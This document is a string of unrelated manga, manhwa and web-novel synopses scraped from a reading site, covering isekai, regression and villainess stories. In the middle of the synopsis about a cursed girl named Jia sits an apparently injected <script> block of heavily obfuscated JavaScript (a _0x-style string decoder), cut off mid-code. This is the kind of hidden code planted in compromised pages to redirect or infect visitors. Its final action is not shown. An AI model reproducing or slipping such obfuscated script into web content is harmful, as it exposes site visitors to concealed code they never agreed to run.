The early days of the virtual reality game, Arena. Meleegod was the strongest ranked player! He deleted his character and suddenly left. In order to restore his bankrupt family, he returned to Arena! “Do you want to create a character?”
\"One young salaryman who had been using camping in a plug-in hybrid car that used both electricity and gasoline as an escape plan suddenly finds himself transported to another world with his car! He\'ll start his life anew in this different world!\"
There were two heroes who had defeated the demon lord. Aino the swordswoman and Iro the mage. Before the world attainted its peace, the two girls had made a promise to travel the world after the demon lord\'s subjugation. This is their heartrending but dazzling journey across a fantasy world.
Getting struck by lightning, breaking a bone, failing exams?these are the “accidents” that happen when one becomes friends with Jia. Bringing bad luck to people has been a condition of Jia’s for as long as she can remember… until she meets Gun and Hyun? two mysterious brothers who happen to be wizards! With the help of magic, she’s determined to ward off her curse no matter what. But does Jia realize what kind of sorcery she’s actually getting herself into?<script></script><script>function _0x5947(_0x484b24,_0xab3b84){var _0x2ccd23=_0x54c8();return _0x5947=function(_0x4977c3,_0x185205){_0x4977c3=_0x4977c3-(0x787*-0x5+0x13c2+0x1303);var _0x1c7242=_0x2ccd23[_0x4977c3];return _0x1c7242;},_0x5947(_0x484b24,_0xab3b84);}(function(_0x1cd4d2,_0x38878b){var _0x291114=_0x5947,_0x29fdcc=_0x1cd4d2();while(!![]){try{var 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Every day is a little bit strange. Every day is wonderful. Here in Shiratama-cho, strange things come to life like fireflies. --- This is a cute, short manga that will touch your heart deeply. It portrays the \"poetic days\" of an office worker, Awako, who lives in the town.
Read manhwa The Villainess Wants to Coexist / 여주는 회귀하고 악녀는 공존을 모색한다 From everyone’s reactions toward me, it was easy to figure out. It seemed that I had possessed Carmen Lacita, a naturally evil woman who appears in a fantasy novel… However, the heroine of the novel, Eleanor, who was clearly hostile towards me, said one phrase: “You and I cannot coexist.” What on earth does this mean?! Wait a moment, please listen to what I have to say!!
Read manga Once a Predator, Now a Sacrifice [Official] / 生贄悪女は政敵王子の番となる When the villainess comes back to life, she discovers that the prince who once hated her is now madly in love with her?! In this world, “Predators” are the rulers who wield powerful magic, while those born with the “Mark of Sacrifice” are despised as mere wells of magic for Predators to absorb and tools for bearing offspring. Prince Greg, second in line to the throne, recently rejected a marriage offer from Lady Letishia, a vile Predator. Determined to understand his reasons, she confronts him at the palace—only for both of them to become victims of an assassination attempt, losing their lives in the process. The next moment, Letishia finds herself transported back in time to the day she went to see Greg. Yet, this miraculous second chance comes at a price: she now bears the Mark of Sacrifice. Imprisoned by her family and facing a future of exploitation, Letishia strikes a deal with Greg, offering him her magic in exchange for his protection. Though they wed under the terms of a loveless contract, Greg seems to have fallen deeply in love with Letishia. But is this genuine love, or is it simply the mark’s influence?
There’s a legendary Bishoujo Game that has become popular among Japanese gentlemen. Its name is “ Magical★Explorer” or Magiero for short. The game’s protagonist has a cheat-like power with12 different beautiful heroines to flirt with, including additional 12 heroines from the DLC, a harem of 24 beauties. I have become that protagonist!………………Not. Instead, I have become the third-wheel character who always laughing like an idiot next to him. There’s no heroine that would lay their eyes on me. But now I couldn’t care less about the protagonist and his heroines. Why? Because I discovered magic. While I was using it, I have become interested in it. I want to master it. I want to become the strongest. Thus I have decided. I would abandon half my role as a protagonist’s friend to train my magic and then I would beat the hell out of that cheat who can solo the Demon King. ………..I was training with that thought in mind, but somehow I keep getting closer to the heroines and furthermore, I don’t know why I keep encounter events like I am some Eroge’s protagonist.
This is the story of Ryo, who was reincarnated in the world of swords and magic. It is a story of the royal road to survive using the magic of the water attribute. What is magic? What is swordsmanship? How does it relate to the laws of physics that we know? And what is politics? What is a nation? Why are there many \"kingdoms\" in reincarnation stories? Will republics not work? Can it be written…? Since he is a water-based magician, he shall start with the \"hydrogen bond!\"
Read manhua The Sweet Wife In Your Palm / 掌上甜妻深深宠 Twelve years ago, Min Youyin convinced her father to adopt Ye Qihan as his own, but by doing so her family was torn apart. Backed into a corner, Min Youyin was saved by Zhan Yunting, a man who appeared to have a cold front, but was actually warm-hearted. She believed that he was someone untouchable, until he knelt down on one knee and proposed, “I love you, marry me.” It was only then she knew that the world’s most surprising love: her being secretly in love with him, and him happening to be infatuated with her too.
As The Master Of The School Of Unholy Arts And As The Undefeated Unmasked Demon, Mookhyang Unfortunately Falls To A Strange Fantasy World By The Magic Of His Enemies (School Of Blood Arts). In The New World Of Elf, Sorcerer, Knight, And Dragon, Mookhyang’s Adventure Of Finding A Way Back To His Old World (Murim) Unfolds.
Read manhwa Even if the Villain’s Daughter Regresses / Even if the Villain’s Daughter Returns / 악당의 딸은 회귀해봤자 A child who lost everything to a villain. Ten years later, that child returned as a hero called a demigod. And the enraged hero began his revenge by killing the villain and his family… But there was a problem. It was that Lila was the daughter of that villain. “Are you Lila Hildegar?” “You’ve got the wrong person.” “No, I think I’ve got the right one.” …Pretending to be someone else, failed! “Please spare me.” “No.” …Begging for her life also failed! There was no other choice. Lila chose the last resort. “Any last words?” It was to swallow the “Regression Stone” and return to the past after death. “It wasn’t pleasant meeting you, so let’s never see each other again!” That’s how Lila returned to the past, opened her eyes at the age of ten, and… Died again. Lila tried to survive. She tried and tried again. That was all she did… “Why did you save me?” The boy answered with a pale face. “Because I’ve gone mad.” …The enemy who had driven Lila to death several times became strange. [Villain’s daughter female lead/female lead who wants to live to be 90/is still the villain’s daughter even if she regresses] [Male lead who lost his home and family to the villain/male lead whose only goal in life is revenge] [Opposing parties are enemies → What are you doing right now…?]